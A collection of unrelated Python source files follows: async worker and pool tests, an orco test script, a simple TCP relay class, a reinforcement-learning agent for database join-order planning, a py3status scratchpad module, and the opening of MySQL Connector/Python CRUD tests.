return os.getpid()
p = amp.Worker(target=sleepypid)
p.start()
await p.join()
self.assertFalse(p.is_alive())
self.assertEqual(p.result, p.pid)
@async_test
async def test_worker_join(self):
async def sleepypid():
await asyncio.sleep(0.1)
return os.getpid()
# test results from join
p = amp.Worker(target=sleepypid)
p.start()
self.assertEqual(await p.join(), p.pid)
# test awaiting p directly, no need to start
p = amp.Worker(target=sleepypid)
self.assertEqual(await p, p.pid)
@async_test
async def test_pool_worker(self):
tx = context.Queue()
rx = context.Queue()
worker = PoolWorker(tx, rx, 1)
worker.start()
self.assertTrue(worker.is_alive())
tx.put_nowait((1, mapper, (5,), {}))
await asyncio.sleep(0.5)
result = rx.get_nowait()
self.assertEqual(result, (1, 10))
self.assertFalse(worker.is_alive()) # maxtasks == 1
@async_test
async def test_pool(self):
values = list(range(10))
results = [await mapper(i) for i in values]
async with amp.Pool(2) as pool:
await asyncio.sleep(0.5)
self.assertEqual(pool.process_count, 2)
self.assertEqual(len(pool.processes), 2)
self.assertEqual(await pool.apply(mapper, (values[0],)), results[0])
self.assertEqual(await pool.map(mapper, values), results)
self.assertEqual(
await pool.starmap(starmapper, [values[:4], values[4:]]),
[results[:4], results[4:]],
)
|
test.py | import itertools
import os
import random
import threading
import time
from orco import Runtime, LocalExecutor
if os.path.isfile("test.db"):
os.unlink("test.db")
rt = Runtime("test.db")
executor = LocalExecutor(heartbeat_interval=1, n_processes=1)
rt.register_executor(executor)
executor2 = LocalExecutor(heartbeat_interval=1)
executor2._debug_do_not_start_heartbeat = True
rt.register_executor(executor2)
executor3 = LocalExecutor(heartbeat_interval=1)
rt.register_executor(executor3)
executor3.stop()
c_sleepers = rt.register_builder("sleepers", lambda c, d: time.sleep(c))
c_bedrooms = rt.register_builder("bedrooms", lambda c, d: None,
lambda c: [c_sleepers.task(x) for x in c["sleepers"]])
def failer(config, deps):
raise Exception("Here!")
c_failers = rt.register_builder("failers", failer)
try:
rt.compute(c_failers.task({"type": "fail1"}))
except Exception as e:
print(e)
print("Failer failed (and it is ok")
rt.compute(c_bedrooms.task({"sleepers": [0.1]}))
t = threading.Thread(target=(lambda: rt.compute(c_bedrooms.task({"sleepers": list(range(10))}))))
t.start()
time.sleep(0.5) # To solve a problem with ProcessPool, fix waits for Python3.7
c = rt.register_builder("hello")
rt.insert(c.task("e1"), "ABC")
rt.insert(c.task("e2"), "A" * (7 * 1024 * 1024 + 200000))
c = rt.register_builder("estee")
graphs = ["crossv", "fastcrossv", "gridcat"]
models = ["simple", "maxmin"]
scheduler = [
"blevel", "random", {
"name": "camp",
"iterations": 1000
}, {
"name": "camp",
"iterations": 2000
}
]
for g, m, s in itertools.product(graphs, models, scheduler):
rt.insert(c.task({"graph": g, "model": m, "scheduler": s}), random.randint(1, 30000))
c = rt.register_builder("builder with space in name")
rt.serve()
|
proxy.py | import threading
import socket
from toolkit.network import basic # pylint: disable=import-error
class Proxy():
def __init__(self, serverport, serveraddr, clientport, clientaddr):
threading.Thread.__init__(self)
self.running = True
self.serverAddr = (clientaddr, clientport)
self.clientAddr = (serveraddr, serverport)
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.serverConn = None
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def handlerServer(self, args, handler):
try:
while self.running:
data = basic.recvall(self.serverConn)
data = handler(data)
self.client.sendall(data)
if not self.running or data == b"":
self.stop()
break
except ConnectionAbortedError:
pass
def handlerClient(self, _self_, args, handler):
self = _self_
try:
while self.running:
data = basic.recvall(self.client)
data = handler(data)
self.serverConn.sendall(data)
if not self.running or data == b"":
self.stop()
break
except ConnectionAbortedError:
pass
def stop(self):
self.running = False
self.server.close()
self.client.close()
self.serverConn.close()
try: self.clientThread.join()
except: pass
def start(self, clientArgs, serverArgs, server2client, client2server):
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind(self.serverAddr)
self.server.listen()
conn, _ = self.server.accept()
self.serverConn = conn
self.client.connect(self.clientAddr)
self.clientThread = threading.Thread(target=self.handlerClient, args=[self, clientArgs, client2server])
self.clientThread.start()
self.handlerServer(serverArgs, server2client)
|
policy_grad.py | from plan import *
from database_env import DataBaseEnv_QueryEncoding
from utils.utils import *
from utils.db_utils import *
from tree import *
import torch.multiprocessing as mp
import torch
import torch.nn as nn
import numpy as np
from copy import deepcopy
import time
from torch.utils.tensorboard import SummaryWriter
import re
import logging
LOG = logging.getLogger(__name__)
INF = 1e9
# def loss_func(pred, target):
# # target = [b_indices, dim_1_indices, dim_2_indices], q-values
# # pred.shape = [Nf, max(ni), max(ni)
# # print(pred[target[0]][:10])
# # print(target[1][:10])
# # preds = torch.clamp(pred[target[0]], max=float(np.log(3*10**5)))
# preds = pred[target[0]]
# return torch.nn.functional.mse_loss(preds, target[1])
class EnvBase(DataBaseEnv_QueryEncoding):
def __init__(self, env_config):
super().__init__(env_config)
self.cardinalities = env_config.get("cardinalities")
def apply_plan_encoding(self, plan):
g = plan.G
for n in g:
node_info = g.nodes[n]
if not "feature" in node_info:
if self.cardinalities:
vec = np.zeros(len(self.rels)+1)
if 'name' in node_info:
vec[-1] = self.cardinalities[plan.initial_query][node_info['name']]
else:
vec = np.zeros(len(self.rels))
vec[[self.rel_to_idx[t] for t in node_info['tables']]] = 1
g.nodes[n]["feature"] = vec.reshape(1, -1)
def get_obs(self, plan=None):
p = plan if plan else self.plan
self.apply_plan_encoding(p)
return super().get_obs(p), to_forest(p)
class EnvPlan(EnvBase):
def __init__(self, env_config, true_reward=True):
super().__init__(env_config)
self.true_reward = true_reward
def get_state(self):
return self.get_obs(self.plan)
def step(self, action):
self.plan.join(*self.plan.action_to_join(action))
is_complete = self.plan.is_complete
cost = None
if is_complete and self.true_reward:
cost = self.reward()
return None, cost, is_complete, None
# class EnvPlanBeam(EnvBase):
# def __init__(self, env_config, beam_width, true_reward=True):
# super().__init__(env_config)
# self.true_reward = true_reward
# self.beam_width = beam_width
#
# def reset(self, idx=None):
# super().reset(idx)
# self.plans = [self.plan]
#
# def get_states(self):
# obs = []
# for plan in self.plans:
# obs.append(self.get_obs(plan))
# return obs
#
# def step(self, actions):
# plans = {}
# for i, a in enumerate(actions):
# p = deepcopy(self.plans[i])
# p.join(*p.action_to_join(a), action=a)
# plans[p] = None
# if len(plans) == self.beam_width:
# break
# self.plans = list(plans.keys())
# is_complete = self.plans[0].is_complete
# cost = None
# self.plan = self.plans[0]
# if self.true_reward:
# cost = self.reward()
# return None, cost, is_complete, None
def FC(d_in, d_out, fc_nlayers, drop):
dims = torch.linspace(d_in, d_out, fc_nlayers+1, dtype=torch.long)
layers = []
for i in range(fc_nlayers-1):
layers.extend([nn.Linear(int(dims[i]), int(dims[i+1])),
nn.Dropout(drop), nn.LayerNorm([int(dims[i+1])]), nn.ReLU()])
layers.append(nn.Linear(int(dims[-2]), d_out))
return nn.Sequential(*layers)
class Net(nn.Module):
def __init__(self, d_emb, d_query, d_model, d_pairwise, nhead, ffdim, nlayers, fc_nlayers, drop, pretrained_path=False, fit_pretrained_layers=[], **kwargs):
super().__init__()
self.args = {k: v for k, v in locals().items() if k not in [
'self', '__class__']}
# Tree transformer
self.enc = nn.Linear(d_emb, (d_model+1)//2)
self.trans_enc = nn.TransformerEncoder(
TreeTransformerEncoderLayer(d_model, nhead, ffdim, drop), nlayers)
self.cls = nn.Parameter(torch.empty((1, 1, d_model)))
torch.nn.init.xavier_uniform_(self.cls, gain=1.0)
# Pairwise module to get values for each possible action
# self.key = torch.nn.Linear(d_model, d_pairwise)
# self.query = torch.nn.Linear(d_model, d_pairwise)
# FC layers
self.key = FC(d_model, d_pairwise, fc_nlayers, drop)
self.query = FC(d_model, d_pairwise, fc_nlayers, drop)
self.val = FC(d_model, 1, fc_nlayers, drop)
# Query level
d_q = d_model // 2
self.qn = nn.Sequential(nn.Linear(d_query, d_q))
self.pretrained_path = pretrained_path
self.fit_pretrained_layers = fit_pretrained_layers
def forward(self, inputs):
q, t = inputs
q = self.qn(q).unsqueeze(0) # [1, (n1+n2+...), d_model // 2]
x, indices, lens = t
# [L, (n1+n2+...), d_model // 2]; ni = number of trees in i-th forest
x = self.enc(x)
# [L, (n1+n2+...), d_model]
x = torch.cat((x, q.expand(x.shape[0], -1, -1)), -1)
x = torch.cat((self.cls.expand(-1, x.shape[1], -1), x), 0)
x, _ = self.trans_enc((x, indices)) # [1, (n1+n2+...), d_model], ...
l = torch.split(x[0], lens)
x = torch.nn.utils.rnn.pad_sequence(
l, batch_first=True) # [Nf, max(ni), d_model]
V = self.val(torch.mean(x, 1)) # [Nf, 1]
k, q = self.key(x), self.query(x)
P = (torch.matmul(k, q.transpose(1, 2))
/ np.sqrt(k.shape[-1])) # [Nf, max(ni), max(ni)]
return P, V
# def new(self):
# if self.pretrained_path:
# model = deepcopy(self)
# model.load_state_dict(torch.load(self.pretrained_path))
# return model
# else:
# return self.__class__(**self.args)
def collate(batch):
if isinstance(batch[0][0], np.ndarray):
q_enc, forests = zip(*batch)
lens = [len(f) for f in forests]
flatten_tc_batch = flatten_batch_TreeConv([t.to_torch().to(
dtype=torch.float) for f in forests for t in f], batch_first=False)
q_enc = torch.repeat_interleave(torch.tensor(
q_enc, dtype=torch.float), torch.tensor(lens), dim=0)
# [n_sum, d_qenc], ([L,n_sum,d_enc],[3L,n_sum,1],[batch_size])
return q_enc, (*flatten_tc_batch, lens)
# batch is a list of trajectories with different length
# make it flat first
batch = [x for traj in batch for x in traj]
x, y = zip(*batch)
actions, valid_mask, done_mask, rewards = zip(*y)
valid_mask = stack_masks(list(valid_mask))
size = valid_mask.shape[1]
# flat_actions = [list(range(len(actions))),
# [a[0] for a in actions],
# [a[1] for a in actions]]
flat_actions = torch.tensor([a[0]*size + a[1]
for i, a in enumerate(actions)]).view(-1, 1)
done_mask = torch.tensor(done_mask)
rewards = torch.tensor(rewards, dtype=torch.float)
return collate(x), (flat_actions, valid_mask, done_mask, rewards)
class TrajectoryStorage():
def __init__(self):
self.episodes = []
def set_env(self, env):
self.env = env
def split_trajectory(self, plan, reward):
traj = []
for i, (node, action) in enumerate(plan._joins[::-1]):
plan.disjoin(node)
obs = self.env.get_obs(deepcopy(plan))
traj.append(
[obs, (action, get_mask(plan), i == 0, (i == 0)*reward)])
return traj[::-1]
def append(self, plan, final_reward):
self.episodes.append(self.split_trajectory(
deepcopy(plan), final_reward))
def get_dataset(self, n=1000):
"""Get last n trajectories"""
return self.episodes[-n:]
def ac_loss(pred, actions, valid_mask, done_mask, rewards, gamma):
# [Nf, max(ni), max(ni)], [Nf, 1]
logits, values = pred
shape = logits.shape
# compute qvalues based on rewards and predicted values of the next state
qvalues = torch.where(done_mask,
rewards, gamma * values.detach().roll(-1, 0))
advantage = (qvalues.view(-1) - values)
masked_logits = torch.where(valid_mask,
logits, -torch.tensor(INF).to(valid_mask.device))
# [Nf, max(ni), max(ni)]
log_probs = (masked_logits
- masked_logits.logsumexp(dim=[1, 2], keepdim=True))
log_probs = log_probs.view(shape[0], -1) # [Nf, max(ni)*max(ni)]
log_prob_action = torch.gather(log_probs, 1, actions).view(-1, 1) # [Nf]
probs = torch.exp(log_probs) # [Nf, max(ni)*max(ni)]
# mse
value_loss = advantage.pow(2).mean()
# policy grad loss
policy_loss = -(log_prob_action*advantage.detach()).mean()
# - entropy
entropy_loss = torch.sum(log_probs*probs
/ torch.sum(valid_mask, dim=[1, 2]).view(-1, 1) / shape[0])
return policy_loss, value_loss, entropy_loss
# def ppo_loss(self, actions, returns, values, logits, old_probs, value_coeff=1., entropy_coef=1.):
# advantage = returns - values # [length, batch_size if != 1]
# # compute log(pi)
# log_probs = torch.log_softmax(logits, dim=-1) # [length, batch_size, n_actions]
# probs = torch.softmax(logits,dim=-1)
# new_probs = probs.gather(-1,actions).squeeze() # [length, batch_size if != 1]
# # compute loss
# value_loss = advantage.pow(2).mean()
# # Clipped version of value loss
# # value_obj = advantage.pow(2)
# # value_obj2 = (returns - old_values + torch.clamp(values-old_values, -self.eps, self.eps)).pow(2)
# # value_loss = torch.mean(torch.max(value_obj,value_obj2))
# entropy = -(log_probs*probs).sum(-1).mean()
# ratio = new_probs/old_probs.detach()
# obj = ratio*advantage.detach()
# obj2 = torch.clamp(ratio, 1-self.eps, 1+self.eps)*advantage.detach()
# clip_loss = torch.mean(torch.min(obj,obj2))
# loss = -clip_loss + value_coeff*value_loss - entropy_coef*entropy
# return loss
#
#
# def ppo_update(self, opt, rollout, next_value, max_grad_norm, batch_part=0.5, epochs=10, **args):
# # loss here is the method of the instance Loss
# obs, rewards, actions, logits, values, probs = rollout.get()
# returns = disc_return(rewards, next_value, 0.95) # [length, batch_size if != 1]
# old_probs = probs.gather(-1, actions).squeeze() # [length, batch_size if != 1]
# sampler = Sampler(int(batch_part),[obs,actions,returns, old_probs.detach()])
# for _ in range(epochs):
# # perform gradient descent for several epochs
# batch_obs, batch_actions, batch_returns, batch_old_probs = sampler.get_next()
# batch_logits, batch_values = self.agent.forward(batch_obs)
# obj = ppo_loss(batch_actions, batch_returns, batch_values.squeeze(), batch_logits, batch_old_probs)
# obj.backward()
# torch.nn.utils.clip_grad_norm_(self.agent.parameters(), max_grad_norm)
# opt.step()
# opt.zero_grad()
# scheduler.step()
class Agent(nn.Module):
def __init__(self, net, collate_fn, eps=1e-2, device='cuda'):
super().__init__()
self.net = net.to(device=device)
self.collate_fn = collate_fn
self.device = device
self.eps = eps
if self.net.pretrained_path:
self.net.load_state_dict(torch.load(self.net.pretrained_path))
if len(self.net.fit_pretrained_layers) > 0:
self.net.requires_grad_(False)
unfreezing_p = []
for n, m in self.net.named_parameters():
for l in self.net.fit_pretrained_layers:
pattern = re.compile(f"{l}\.|{l}$")
if re.match(pattern, n):
unfreezing_p.append(n)
m.requires_grad_(True)
LOG.debug(f"Training parameters: {unfreezing_p}")
def predict(self, inputs, mask):
# [Nf, max(ni), max(ni)], [Nf, 1]
logit, values = self.predict_net(self.net, self.collate_fn(inputs))
dims = logit.shape
masked_logit = torch.where(mask.view(dims).to(logit.device),
logit, torch.tensor(float("-inf")).to(logit.device))
# [Nf, max(ni)*max(ni)]
probs = masked_logit.view(dims[0], -1).softmax(1).cpu().numpy()
actions = [np.random.choice(len(prob), p=prob) for prob in probs]
# convert array of flat indices into a tuple of coordinate arrays
actions = list(zip(*np.unravel_index(actions, dims[1:])))
return actions, values.cpu().numpy().squeeze()
def train_net(self, train_data, epochs, criterion, batch_size, lr, scheduler, gamma, value_loss_coef, entropy_loss_coef, weight_decay, clip_grad_norm, betas, val_data=None, val_steps=100, min_iters=1000):
LOG.info(f"Start training: {time.ctime()}")
opt = torch.optim.Adam(self.net.parameters(),
lr=lr, betas=betas, weight_decay=weight_decay)
def lambda_lr(epoch): return scheduler ** np.sqrt(epoch)
sched = torch.optim.lr_scheduler.LambdaLR(opt, lr_lambda=lambda_lr)
train_dl = torch.utils.data.DataLoader(
train_data, batch_size=batch_size, drop_last=False, shuffle=True, collate_fn=self.collate_fn, num_workers=0)
iters = max(min_iters, int(epochs*len(train_dl)))
di = iter(train_dl)
for i in range(iters):
try:
x_batch, y_batch = next(di)
except:
di = iter(train_dl)
x_batch, y_batch = next(di)
x_batch, y_batch = to_device(
x_batch, self.device), to_device(y_batch, self.device)
pred = self.net(x_batch)
pg_loss, value_loss, entropy_loss = criterion(
pred, *y_batch, gamma=gamma)
(pg_loss + value_loss_coef*value_loss
+ entropy_loss_coef*entropy_loss).backward()
torch.nn.utils.clip_grad_norm_(
self.net.parameters(), clip_grad_norm, norm_type=2.0)
opt.step()
opt.zero_grad()
sched.step()
LOG.info(
f"""End training: {time.ctime()},
Policy loss: {pg_loss.item():.2f},
Value loss: {value_loss.item():.2f},
Entropy loss {entropy_loss.item():.2f},
{iters} iterations.""")
return pg_loss.item(), value_loss.item(), entropy_loss.item()
def predict_net(self, net, x_batch):
with evaluation_mode(net):
x_batch = to_device(x_batch, self.device)
out = net(x_batch)
return out
class PolicyGrad():
def __init__(self, agent, env_config, args, train_args, experience=[], baseline_plans={}):
self.env_config = env_config
self.train_args = train_args
self.env_config['return_latency'] = args['latency']
self.n_workers = args['n_workers']
self.total_episodes = args['total_episodes']
self.n_update = args['n_update']
self.n_train_episodes = args['n_train_episodes']
self.gamma = args['gamma']
self.sync = args['sync']
self.num_complete_plans = args['num_complete_plans']
self.save_explored_plans = args['save_explored_plans']
self.traj_storage = TrajectoryStorage()
self.experience = PlanExperience(experience, add_sub_plans=False)
self.agent = agent.share_memory()
self.agent.eps = args['eps']
self.step = mp.Value('i', 0)
self.episode = mp.Value('i', 0)
self.n_queries = len(env_config['db_data'])
self.query_ids = mp.Array('i', list(range(self.n_queries)))
self.update_q = mp.Queue()
self.step_flag = mp.Event()
self.baseline_plans = baseline_plans # {query : plan, ...}
self.logdir = args['logdir']
self.cost_func = cost_function[args['cost_func']]
self.env_config['selectivity'] = args['selectivity']
self.log_q = mp.Queue()
encoding = args.get('encoding', 'neo')
if encoding == 'neo':
self.env_plan = EnvPlan
elif encoding == 'rtos':
self.env_plan = EnvPlanHeapRTOS
elif encoding == 'neo_pgdata':
self.env_plan = EnvPlanHeapWithPGdata
else:
raise Exception(
'Wrong encoding name in config. '
f'Provided "{encoding}" but allowed only "neo" or "rtos"'
)
if self.env_config['selectivity']:
DataBaseEnv_QueryEncoding.compute_cardinalities(self.env_config)
def run(self):
runners = [mp.Process(target=self.runner_process, daemon=True)
for _ in range(self.n_workers)]
logger = mp.Process(target=self.logger, daemon=True)
logger.start()
LOG.info('Summary writer started.')
for r in runners:
r.start()
self.update_process()
def logger(self):
writer = SummaryWriter(self.logdir)
while self.episode.value < self.total_episodes * self.n_queries:
r = self.log_q.get()
if len(r) == 2:
losses, ep = r
pg_loss, value_loss, entropy_loss = losses
writer.add_scalar('Loss/policy_loss', pg_loss, ep)
writer.add_scalar('Loss/value_loss', value_loss, ep)
writer.add_scalar('Loss/entropy_loss', entropy_loss, ep)
torch.save(self.agent.net.state_dict(),
Path(self.logdir) / 'state_dict.pt')
else:
(n_plans, n_subplans), best_found_costs, generated_costs, baseline_costs, reward, step, episode = r
writer.add_scalar(
'Experience size/complete unique plans', n_plans, episode)
writer.add_scalar(
'Rewards', reward, step)
for stat_type, costs in (('best_found', best_found_costs), ('generated', generated_costs)):
if costs.keys() >= self.env_config['db_data'].keys():
writer.add_scalar(f"Cost/{stat_type}/avg_cost:episode",
np.mean(list(costs.values())), episode)
if baseline_costs.keys() >= costs.keys():
average_ratio = np.mean(
[costs[q]/baseline_costs[q] for q in costs])
writer.add_scalar(
f'Cost/{stat_type}/avg_baseline_ratio:episode', average_ratio, episode)
writer.add_scalar(
f'Cost/{stat_type}/avg_baseline_ratio:experience', average_ratio, n_plans)
def runner_process(self):
env = self.env_plan(self.env_config)
is_done = True
while True:
if is_done:
if self.episode.value >= self.total_episodes * self.n_queries:
return
with self.episode.get_lock():
if self.episode.value % self.n_update == 0 and self.sync:
self.step_flag.clear()
query_num = self.episode.value % self.n_queries
if query_num == 0:
np.random.shuffle(self.query_ids)
query_idx = self.query_ids[query_num]
env.reset(query_idx)
self.episode.value += 1
self.step_flag.wait()
obs = [env.get_state()]
mask = get_mask(env.plan) # [N, max(ni), max(ni)]
actions, _ = self.agent.predict(obs, mask)
_, cost, is_done, _ = env.step(actions[0])
with self.step.get_lock():
self.step.value += 1
if is_done:
self.update_q.put(([env.plan], [cost], env.query_id))
def update_process(self):
env = self.env_plan(self.env_config)
self.traj_storage.set_env(env)
BASELINE_REWARD = 0.5
for p in self.baseline_plans.values():
self.traj_storage.append(p, BASELINE_REWARD)
generated_costs = {}
baseline_costs = {q: self.experience.get_cost(
p, q) for q, p in self.baseline_plans.items()}
episode = 0
while True:
if episode % self.n_update == 0:
LOG.info(
f"Update started, step: {self.step.value}, episode: {episode}, time: {time.ctime()}")
if episode == 0:
data = self.traj_storage.get_dataset(n=self.n_queries)
else:
data = self.traj_storage.get_dataset(
n=self.n_train_episodes)
train_data = data
val_data = None
# val_split = max(1, min(self.val_size, int(0.3*len(data))))
# train_data, val_data = data[:-val_split], data[-val_split:]
losses = self.agent.train_net(
train_data=train_data, val_data=val_data, val_steps=1, criterion=ac_loss, gamma=self.gamma, **self.train_args)
LOG.info(
f"Update ended, step: {self.step.value}, episode: {episode}, time: {time.ctime()}")
# allow exploring
self.step_flag.set()
self.log_q.put((losses, self.step.value))
# save found plans
path = Path(self.logdir) / 'plans'
path.mkdir(parents=True, exist_ok=True)
best_plans = self.experience.plans_for_queries()
for q, p in best_plans.items():
p.save(path / f"{q}.json")
LOG.info(
f"Best plans after {episode} episodes saved to {str(path)}")
if (episode >= self.total_episodes * self.n_queries):
return
complete_plans, costs, query_id = self.update_q.get()
for plan, cost in zip(complete_plans, costs):
# reward = (
# baseline_costs[query_id] - cost)/baseline_costs[query_id]
reward = - np.log(cost/baseline_costs[query_id])
LOG.debug(
f"Completed plan for {query_id} query with cost = {cost}, reward = {reward}")
self.experience.append(plan, cost, query_id)
self.traj_storage.append(plan, reward)
# update values for log
average_generated_cost = self.experience.get_cost(
complete_plans[0], query_id)
if average_generated_cost is not None:
generated_costs[query_id] = average_generated_cost
baseline_costs[query_id] = self.experience.get_cost(
self.baseline_plans[query_id], query_id)
best_found_costs = self.experience.costs_for_queries()
self.log_q.put((self.experience.size(), best_found_costs,
generated_costs, baseline_costs, reward, self.step.value, episode))
if self.save_explored_plans and episode % (5 * self.n_queries) == 0:
for i, (p, q) in enumerate(self.experience.complete_plans.keys()):
save_path = Path(self.logdir) / 'all_plans' / str(q)
save_path.mkdir(parents=True, exist_ok=True)
p.save(save_path / f"{i}.json")
episode += 1
def generate_plan_beam_search(self, query_id, num=1):
is_done = False
env = self.env_plan(self.env_config, num, False)
env.reset(query_id)
self.agent.eps = 0
i = 0
while not is_done:
# print(len(env.plans), i)
obs = env.get_states()
valid_actions = env.valid_actions()
actions = self.agent.predict(obs, valid_actions)
_, _, is_done, _ = env.step(actions)
i += 1
return env.plan
def log_cost(a, *args):
return np.log(a)
def no_op(a, *args):
return a
def baseline_ratio_cost(a, baseline, *args):
return np.array(a)/baseline
def difference_reward(a, baseline, *args):
return baseline/a - 1.
cost_function = {
'log': log_cost,
'no_op': no_op,
'baseline_ratio': baseline_ratio_cost,
'difference_reward': difference_reward,
}
|
scratchpad.py | """
Display number of scratchpad windows and urgency hints.
Configuration parameters:
cache_timeout: refresh interval for i3-msg or swaymsg (default 5)
format: display format for this module
(default "\u232b [\\?color=scratchpad {scratchpad}]")
thresholds: specify color thresholds to use
(default [(0, "darkgray"), (1, "violet")])
Format placeholders:
{scratchpad} number of scratchpads
{urgent} number of urgent scratchpads
Color thresholds:
xxx: print a color based on the value of `xxx` placeholder
Optional:
i3ipc: an improved python library to control i3wm and sway
Examples:
```
# hide zero scratchpad
scratchpad {
format = '[\\?not_zero \u232b [\\?color=scratchpad {scratchpad}]]'
}
# hide non-urgent scratchpad
scratchpad {
format = '[\\?not_zero \u232b {urgent}]'
}
# bring up scratchpads on clicks
scratchpad {
on_click 1 = 'scratchpad show'
}
# add more colors
scratchpad {
thresholds = [
(0, "darkgray"), (1, "violet"), (2, "deepskyblue"), (3, "lime"),
(4, "yellow"), (5, "orange"), (6, "red"), (7, "tomato"),
]
}
```
@author shadowprince (counter), cornerman (async)
@license Eclipse Public License (counter), BSD (async)
SAMPLE OUTPUT
[{'full_text': '\u232b '}, {'full_text': u'0', 'color': '#a9a9a9'}]
violet
[{'full_text': '\u232b '}, {'full_text': u'5', 'color': '#ee82ee'}]
urgent
[{'full_text': '\u232b URGENT 1', 'urgent': True}]
"""
STRING_ERROR = "invalid ipc `{}`"
class Ipc:
"""
"""
def __init__(self, parent):
self.parent = parent
self.setup(parent)
class I3ipc(Ipc):
"""
i3ipc - an improved python library to control i3wm and sway
"""
def setup(self, parent):
from threading import Thread
self.parent.cache_timeout = self.parent.py3.CACHE_FOREVER
self.scratchpad_data = {"scratchpad": 0, "urgent": 0}
t = Thread(target=self.start)
t.daemon = True
t.start()
def start(self):
from i3ipc import Connection
i3 = Connection()
self.update(i3)
for event in ["window::move", "window::urgent"]:
i3.on(event, self.update)
i3.main()
def update(self, i3, event=None):
leaves = i3.get_tree().scratchpad().leaves()
temporary = {
"ipc": self.parent.ipc,
"scratchpad": len(leaves),
"urgent": sum(window.urgent for window in leaves),
}
if self.scratchpad_data != temporary:
self.scratchpad_data = temporary
self.parent.py3.update()
def get_scratchpad_data(self):
return self.scratchpad_data
class Msg(Ipc):
"""
i3-msg - send messages to i3 window manager
swaymsg - send messages to sway window manager
"""
def setup(self, parent):
from json import loads
self.json_loads = loads
wm_msg = {"i3msg": "i3-msg"}.get(parent.ipc, parent.ipc)
self.tree_command = [wm_msg, "-t", "get_tree"]
def get_scratchpad_data(self):
tree = self.json_loads(self.parent.py3.command_output(self.tree_command))
leaves = self.find_scratchpad(tree).get("floating_nodes", [])
return {
"ipc": self.parent.ipc,
"scratchpad": len(leaves),
"urgent": sum(window["urgent"] for window in leaves),
}
def find_scratchpad(self, tree):
if tree.get("name") == "__i3_scratch":
return tree
for x in tree.get("nodes", []):
result = self.find_scratchpad(x)
if result:
return result
return {}
class Py3status:
"""
"""
# available configuration parameters
cache_timeout = 5
format = "\u232b [\\?color=scratchpad {scratchpad}]"
thresholds = [(0, "darkgray"), (1, "violet")]
def post_config_hook(self):
# ipc: specify i3ipc, i3-msg, or swaymsg, otherwise auto
self.ipc = getattr(self, "ipc", "")
if self.ipc in ["", "i3ipc"]:
try:
from i3ipc import Connection # noqa f401
self.ipc = "i3ipc"
except Exception:
if self.ipc:
raise # module not found
self.ipc = (self.ipc or self.py3.get_wm_msg()).replace("-", "")
if self.ipc in ["i3ipc"]:
self.backend = I3ipc(self)
elif self.ipc in ["i3msg", "swaymsg"]:
self.backend = Msg(self)
else:
raise Exception(STRING_ERROR.format(self.ipc))
self.thresholds_init = self.py3.get_color_names_list(self.format)
def scratchpad(self):
scratchpad_data = self.backend.get_scratchpad_data()
for x in self.thresholds_init:
if x in scratchpad_data:
self.py3.threshold_get_color(scratchpad_data[x], x)
response = {
"cached_until": self.py3.time_in(self.cache_timeout),
"full_text": self.py3.safe_format(self.format, scratchpad_data),
}
if scratchpad_data["urgent"]:
response["urgent"] = True
return response
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
config = {"format": r"\[{ipc}\] [\?color=scratchpad {scratchpad}]"}
module_test(Py3status, config=config)
|
test_mysqlx_crud.py | # -*- coding: utf-8 -*-
# Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0, as
# published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms,
# as designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an
# additional permission to link the program and your derivative works
# with the separately licensed software that they have included with
# MySQL.
#
# Without limiting anything contained in the foregoing, this file,
# which is part of MySQL Connector/Python, is also subject to the
# Universal FOSS Exception, version 1.0, a copy of which can be found at
# http://oss.oracle.com/licenses/universal-foss-exception.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Unittests for mysqlx.crud
"""
import gc
import json
import logging
import unittest
import threading
import time
import tests
import mysqlx
LOGGER = logging.getLogger(tests.LOGGER_NAME)
_CREATE_TEST_TABLE_QUERY = "CREATE TABLE `{0}`.`{1}` (id INT)"
_INSERT_TEST_TABLE_QUERY = "INSERT INTO `{0}`.`{1}` VALUES ({2})"
_CREATE_TEST_VIEW_QUERY = ("CREATE VIEW `{0}`.`{1}` AS SELECT * "
"FROM `{2}`.`{3}`")
_CREATE_VIEW_QUERY = "CREATE VIEW `{0}`.`{1}` AS {2}"
_DROP_TABLE_QUERY = "DROP TABLE IF EXISTS `{0}`.`{1}`"
_DROP_VIEW_QUERY = "DROP VIEW IF EXISTS `{0}`.`{1}`"
_SHOW_INDEXES_QUERY = "SHOW INDEXES FROM `{0}`.`{1}` WHERE Key_name='{2}'"
_PREP_STMT_QUERY = (
"SELECT p.sql_text, p.count_execute "
"FROM performance_schema.prepared_statements_instances AS p "
"JOIN performance_schema.threads AS t ON p.owner_thread_id = t.thread_id "
"AND t.processlist_id = @@pseudo_thread_id")
def create_view(schema, view_name, defined_as):
query = _CREATE_VIEW_QUERY.format(schema.name, view_name, defined_as)
schema.get_session().sql(query).execute()
return schema.get_view(view_name, True)
def drop_table(schema, table_name):
query = _DROP_TABLE_QUERY.format(schema.name, table_name)
schema.get_session().sql(query).execute()
def drop_view(schema, view_name):
query = _DROP_VIEW_QUERY.format(schema.name, view_name)
schema.get_session().sql(query).execute()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 14), "XPlugin not compatible")
class MySQLxDbDocTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.schema_name = self.connect_kwargs["schema"]
self.collection_name = "collection_test"
try:
self.session = mysqlx.get_session(self.connect_kwargs)
except mysqlx.Error as err:
self.fail("{0}".format(err))
self.schema = self.session.get_schema(self.schema_name)
self.collection = self.schema.create_collection(self.collection_name)
def tearDown(self):
self.schema.drop_collection(self.collection_name)
self.session.close()
def test_dbdoc_creation(self):
doc_1 = mysqlx.DbDoc({"_id": "1", "name": "Fred", "age": 21})
